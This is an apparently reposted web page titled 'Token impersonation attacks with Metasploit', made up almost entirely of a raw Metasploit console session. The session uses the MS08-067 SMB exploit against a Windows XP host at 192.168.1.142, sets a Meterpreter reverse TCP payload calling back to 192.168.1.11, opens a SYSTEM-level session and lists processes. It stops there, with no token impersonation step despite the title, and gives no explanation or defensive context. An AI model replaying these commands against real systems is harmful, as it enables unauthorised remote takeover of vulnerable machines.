Token impersonation attacks with Metasploit

Source: Internet  Category: Web data mining  Editor: Programmer Blog Network  Time: 2024/04/19 19:26
root@bt:~# msfconsole
NOTICE:  CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE:  CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE:  CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "services_pkey" for table "services"
NOTICE:  CREATE TABLE will create implicit sequence "vulns_id_seq" for serial column "vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vulns_pkey" for table "vulns"
NOTICE:  CREATE TABLE will create implicit sequence "refs_id_seq" for serial column "refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "refs_pkey" for table "refs"
NOTICE:  CREATE TABLE will create implicit sequence "notes_id_seq" for serial column "notes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "notes_pkey" for table "notes"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_targets_id_seq" for serial column "wmap_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_targets_pkey" for table "wmap_targets"
NOTICE:  CREATE TABLE will create implicit sequence "wmap_requests_id_seq" for serial column "wmap_requests.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "wmap_requests_pkey" for table "wmap_requests"
NOTICE:  CREATE TABLE will create implicit sequence "workspaces_id_seq" for serial column "workspaces.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "workspaces_pkey" for table "workspaces"
NOTICE:  CREATE TABLE will create implicit sequence "events_id_seq" for serial column "events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "events_pkey" for table "events"
NOTICE:  CREATE TABLE will create implicit sequence "loots_id_seq" for serial column "loots.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "loots_pkey" for table "loots"
NOTICE:  CREATE TABLE will create implicit sequence "users_id_seq" for serial column "users.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "users_pkey" for table "users"
NOTICE:  CREATE TABLE will create implicit sequence "reports_id_seq" for serial column "reports.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "reports_pkey" for table "reports"
NOTICE:  CREATE TABLE will create implicit sequence "tasks_id_seq" for serial column "tasks.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tasks_pkey" for table "tasks"
NOTICE:  CREATE TABLE will create implicit sequence "creds_id_seq" for serial column "creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "creds_pkey" for table "creds"
NOTICE:  CREATE TABLE will create implicit sequence "exploited_hosts_id_seq" for serial column "exploited_hosts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploited_hosts_pkey" for table "exploited_hosts"
NOTICE:  CREATE TABLE will create implicit sequence "report_templates_id_seq" for serial column "report_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "report_templates_pkey" for table "report_templates"
NOTICE:  CREATE TABLE will create implicit sequence "campaigns_id_seq" for serial column "campaigns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "campaigns_pkey" for table "campaigns"
NOTICE:  CREATE TABLE will create implicit sequence "email_templates_id_seq" for serial column "email_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_templates_pkey" for table "email_templates"
NOTICE:  CREATE TABLE will create implicit sequence "attachments_id_seq" for serial column "attachments.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "attachments_pkey" for table "attachments"
NOTICE:  CREATE TABLE will create implicit sequence "email_addresses_id_seq" for serial column "email_addresses.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "email_addresses_pkey" for table "email_addresses"
NOTICE:  CREATE TABLE will create implicit sequence "web_templates_id_seq" for serial column "web_templates.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_templates_pkey" for table "web_templates"
NOTICE:  CREATE TABLE will create implicit sequence "web_sites_id_seq" for serial column "web_sites.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_sites_pkey" for table "web_sites"
NOTICE:  CREATE TABLE will create implicit sequence "web_pages_id_seq" for serial column "web_pages.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_pages_pkey" for table "web_pages"
NOTICE:  CREATE TABLE will create implicit sequence "web_forms_id_seq" for serial column "web_forms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_forms_pkey" for table "web_forms"
NOTICE:  CREATE TABLE will create implicit sequence "web_vulns_id_seq" for serial column "web_vulns.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "web_vulns_pkey" for table "web_vulns"
NOTICE:  CREATE TABLE will create implicit sequence "imported_creds_id_seq" for serial column "imported_creds.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "imported_creds_pkey" for table "imported_creds"
NOTICE:  CREATE TABLE will create implicit sequence "tags_id_seq" for serial column "tags.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "tags_pkey" for table "tags"
NOTICE:  CREATE TABLE will create implicit sequence "sessions_id_seq" for serial column "sessions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "sessions_pkey" for table "sessions"
NOTICE:  CREATE TABLE will create implicit sequence "session_events_id_seq" for serial column "session_events.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "session_events_pkey" for table "session_events"
NOTICE:  CREATE TABLE will create implicit sequence "routes_id_seq" for serial column "routes.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "routes_pkey" for table "routes"
NOTICE:  CREATE TABLE will create implicit sequence "api_keys_id_seq" for serial column "api_keys.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "api_keys_pkey" for table "api_keys"
NOTICE:  CREATE TABLE will create implicit sequence "macros_id_seq" for serial column "macros.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "macros_pkey" for table "macros"
NOTICE:  CREATE TABLE will create implicit sequence "cred_files_id_seq" for serial column "cred_files.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "cred_files_pkey" for table "cred_files"
NOTICE:  CREATE TABLE will create implicit sequence "listeners_id_seq" for serial column "listeners.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "listeners_pkey" for table "listeners"
NOTICE:  CREATE TABLE will create implicit sequence "nexpose_consoles_id_seq" for serial column "nexpose_consoles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "nexpose_consoles_pkey" for table "nexpose_consoles"
NOTICE:  CREATE TABLE will create implicit sequence "profiles_id_seq" for serial column "profiles.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "profiles_pkey" for table "profiles"
NOTICE:  CREATE TABLE will create implicit sequence "mod_refs_id_seq" for serial column "mod_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "mod_refs_pkey" for table "mod_refs"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_details_id_seq" for serial column "vuln_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_details_pkey" for table "vuln_details"
NOTICE:  CREATE TABLE will create implicit sequence "host_details_id_seq" for serial column "host_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "host_details_pkey" for table "host_details"
NOTICE:  CREATE TABLE will create implicit sequence "vuln_attempts_id_seq" for serial column "vuln_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "vuln_attempts_pkey" for table "vuln_attempts"
NOTICE:  CREATE TABLE will create implicit sequence "module_details_id_seq" for serial column "module_details.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_details_pkey" for table "module_details"
NOTICE:  CREATE TABLE will create implicit sequence "module_authors_id_seq" for serial column "module_authors.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_authors_pkey" for table "module_authors"
NOTICE:  CREATE TABLE will create implicit sequence "module_mixins_id_seq" for serial column "module_mixins.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_mixins_pkey" for table "module_mixins"
NOTICE:  CREATE TABLE will create implicit sequence "module_targets_id_seq" for serial column "module_targets.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_targets_pkey" for table "module_targets"
NOTICE:  CREATE TABLE will create implicit sequence "module_actions_id_seq" for serial column "module_actions.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_actions_pkey" for table "module_actions"
NOTICE:  CREATE TABLE will create implicit sequence "module_refs_id_seq" for serial column "module_refs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_refs_pkey" for table "module_refs"
NOTICE:  CREATE TABLE will create implicit sequence "module_archs_id_seq" for serial column "module_archs.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_archs_pkey" for table "module_archs"
NOTICE:  CREATE TABLE will create implicit sequence "module_platforms_id_seq" for serial column "module_platforms.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "module_platforms_pkey" for table "module_platforms"
NOTICE:  CREATE TABLE will create implicit sequence "exploit_attempts_id_seq" for serial column "exploit_attempts.id"
NOTICE:  CREATE TABLE / PRIMARY KEY will create implicit index "exploit_attempts_pkey" for table "exploit_attempts"
[*] The initial module cache will be built in the background, this can take 2-5 minutes...

                 _---------.
             .' #######   ;."
  .---,.    ;@             @@`;   .---,..
." @@@@@'.,'@@            @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@          @@@@@@@@@@@@@ @;
   `.@@@@@@@@@@@@        @@@@@@@@@@@@@@ .'
     "--'.@@@  -.@        @ ,'-   .'--"
          ".@' ; @       @ `.  ;'
            |@@@@ @@@     @    .
             ' @@@ @@   @@    ,
              `.@@@@    @@   .
                ',@@     @   ;           _____________
                 (   3 C    )     /|___ / Metasploit! \
                 ;@'. __*__,."    \|--- \_____________/
                  '(.,...."/


       =[ metasploit v4.5.0-dev [core:4.5 api:1.0]
+ -- --=[ 927 exploits - 499 auxiliary - 151 post
+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search ms08_067_netapi
[-] Warning: database not connected or cache not built, falling back to slow search

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Microsoft Server Service Relative Path Stack Corruption


msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set RHOST 192.168.1.142
RHOST => 192.168.1.142
msf  exploit(ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_http                               normal  Reflective DLL Injection, Reverse HTTP Stager (IPv6)
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dns_txt_query_exec                                        normal  DNS TXT Record Payload Download and Execution
   windows/exec                                                      normal  Windows Execute Command
   windows/loadlibrary                                               normal  Windows LoadLibrary Path
   windows/messagebox                                                normal  Windows MessageBox
   windows/meterpreter/bind_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (IPv6)
   windows/meterpreter/bind_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                      normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager
   windows/meterpreter/reverse_http                                  normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager
   windows/meterpreter/reverse_https                                 normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager
   windows/meterpreter/reverse_ipv6_http                             normal  Windows Meterpreter (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/meterpreter/reverse_ipv6_https                            normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (IPv6)
   windows/meterpreter/reverse_ipv6_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_nonx_tcp                              normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                               normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                   normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                          normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                               normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/metsvc_bind_tcp                                           normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                        normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_ipv6_tcp                            normal  Windows Inject DLL, Bind TCP Stager (IPv6)
   windows/patchupdllinject/bind_nonx_tcp                            normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                 normal  Windows Inject DLL, Bind TCP Stager
   windows/patchupdllinject/reverse_ipv6_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                         normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                          normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                              normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                     normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                          normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/bind_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (IPv6)
   windows/patchupmeterpreter/bind_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                               normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager
   windows/patchupmeterpreter/reverse_ipv6_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                       normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                        normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                            normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                   normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                        normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/shell/bind_ipv6_tcp                                       normal  Windows Command Shell, Bind TCP Stager (IPv6)
   windows/shell/bind_nonx_tcp                                       normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                            normal  Windows Command Shell, Bind TCP Stager
   windows/shell/reverse_http                                        normal  Windows Command Shell, Reverse HTTP Stager
   windows/shell/reverse_ipv6_http                                   normal  Windows Command Shell, Reverse HTTP Stager (IPv6)
   windows/shell/reverse_ipv6_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                    normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                     normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                     normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell_bind_tcp                                            normal  Windows Command Shell, Bind TCP Inline
   windows/shell_reverse_tcp                                         normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                               normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_ipv6_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (IPv6)
   windows/upexec/bind_nonx_tcp                                      normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                           normal  Windows Upload/Execute, Bind TCP Stager
   windows/upexec/reverse_http                                       normal  Windows Upload/Execute, Reverse HTTP Stager
   windows/upexec/reverse_ipv6_http                                  normal  Windows Upload/Execute, Reverse HTTP Stager (IPv6)
   windows/upexec/reverse_ipv6_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                   normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                    normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                        normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                               normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                    normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/vncinject/bind_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (IPv6)
   windows/vncinject/bind_nonx_tcp                                   normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                        normal  VNC Server (Reflective Injection), Bind TCP Stager
   windows/vncinject/reverse_http                                    normal  VNC Server (Reflective Injection), Reverse HTTP Stager
   windows/vncinject/reverse_ipv6_http                               normal  VNC Server (Reflective Injection), Reverse HTTP Stager (IPv6)
   windows/vncinject/reverse_ipv6_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                 normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                     normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                            normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                 normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)

msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.142    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf  exploit(ms08_067_netapi) > set LHOST 192.168.1.11
LHOST => 192.168.1.11
msf  exploit(ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows XP SP2 English (AlwaysOn NX)
   4   Windows XP SP2 English (NX)
   5   Windows XP SP3 English (AlwaysOn NX)
   6   Windows XP SP3 English (NX)
   7   Windows 2003 SP0 Universal
   8   Windows 2003 SP1 English (NO NX)
   9   Windows 2003 SP1 English (NX)
   10  Windows 2003 SP1 Japanese (NO NX)
   11  Windows 2003 SP2 English (NO NX)
   12  Windows 2003 SP2 English (NX)
   13  Windows 2003 SP2 German (NO NX)
   14  Windows 2003 SP2 German (NX)
   15  Windows XP SP2 Arabic (NX)
   16  Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   17  Windows XP SP2 Chinese - Simplified (NX)
   18  Windows XP SP2 Chinese - Traditional (NX)
   19  Windows XP SP2 Czech (NX)
   20  Windows XP SP2 Danish (NX)
   21  Windows XP SP2 German (NX)
   22  Windows XP SP2 Greek (NX)
   23  Windows XP SP2 Spanish (NX)
   24  Windows XP SP2 Finnish (NX)
   25  Windows XP SP2 French (NX)
   26  Windows XP SP2 Hebrew (NX)
   27  Windows XP SP2 Hungarian (NX)
   28  Windows XP SP2 Italian (NX)
   29  Windows XP SP2 Japanese (NX)
   30  Windows XP SP2 Korean (NX)
   31  Windows XP SP2 Dutch (NX)
   32  Windows XP SP2 Norwegian (NX)
   33  Windows XP SP2 Polish (NX)
   34  Windows XP SP2 Portuguese - Brazilian (NX)
   35  Windows XP SP2 Portuguese (NX)
   36  Windows XP SP2 Russian (NX)
   37  Windows XP SP2 Swedish (NX)
   38  Windows XP SP2 Turkish (NX)
   39  Windows XP SP3 Arabic (NX)
   40  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   41  Windows XP SP3 Chinese - Simplified (NX)
   42  Windows XP SP3 Chinese - Traditional (NX)
   43  Windows XP SP3 Czech (NX)
   44  Windows XP SP3 Danish (NX)
   45  Windows XP SP3 German (NX)
   46  Windows XP SP3 Greek (NX)
   47  Windows XP SP3 Spanish (NX)
   48  Windows XP SP3 Finnish (NX)
   49  Windows XP SP3 French (NX)
   50  Windows XP SP3 Hebrew (NX)
   51  Windows XP SP3 Hungarian (NX)
   52  Windows XP SP3 Italian (NX)
   53  Windows XP SP3 Japanese (NX)
   54  Windows XP SP3 Korean (NX)
   55  Windows XP SP3 Dutch (NX)
   56  Windows XP SP3 Norwegian (NX)
   57  Windows XP SP3 Polish (NX)
   58  Windows XP SP3 Portuguese - Brazilian (NX)
   59  Windows XP SP3 Portuguese (NX)
   60  Windows XP SP3 Russian (NX)
   61  Windows XP SP3 Swedish (NX)
   62  Windows XP SP3 Turkish (NX)
   63  Windows 2003 SP2 Japanese (NO NX)


msf  exploit(ms08_067_netapi) > set TARGET 41
TARGET => 41
msf  exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.142    yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
   LHOST     192.168.1.11     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   41  Windows XP SP3 Chinese - Simplified (NX)


msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.1.11:4444 
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.1.142
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.142:1063) at 2013-04-25 17:49:30 -0400

meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
 172   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 448   660   logon.scr          x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\System32\logon.scr
 492   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 588   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 636   588   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   588   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 872   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 888   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 968   704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1072  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 1080  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 1092  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1144  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1180  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1480  1444  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1496  1456  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1580  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1728  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1852  1480  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1860  1480  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1888  1480  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 1956  1092  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe

meterpreter > 


meterpreter > ps

Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
 172   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 492   704   VMwareService.exe  x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\VMwareService.exe
 588   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 632   1480  cmd.exe            x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\cmd.exe
 636   588   csrss.exe          x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 660   588   winlogon.exe       x86   0           NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 704   660   services.exe       x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 872   704   vmacthlp.exe       x86   0           NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 888   704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 968   704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1072  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
 1080  1092  notepad.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\notepad.exe
